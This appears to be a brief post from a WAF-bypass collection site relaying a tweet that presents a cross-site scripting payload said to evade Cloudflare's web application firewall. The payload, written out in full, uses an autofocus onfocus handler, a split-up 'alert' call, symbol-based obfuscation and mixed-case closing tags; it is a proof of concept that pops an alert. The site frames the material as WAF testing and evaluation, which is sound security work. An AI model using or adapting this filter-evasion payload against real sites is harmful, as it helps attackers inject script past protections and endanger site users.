WAF bypass by 0xA1d3

Date: April 24, 2024Author: wafbypass

A bypass for Cloudflare WAF has been discovered for XSS vulnerability. The payload used for bypass is <inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;. This bypass exploits the autofocus attribute to trigger an alert function after a delay. #cloudflare #bypass #waf #xss
Check out the original tweet here: https://twitter.com/0xA1d3/status/1781575999701786814

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools

How to test, evaluate, compare, and bypass web application and API security solutions like WAF, NGWAF, RASP, and WAAP

WAF bypass by 0xA1d3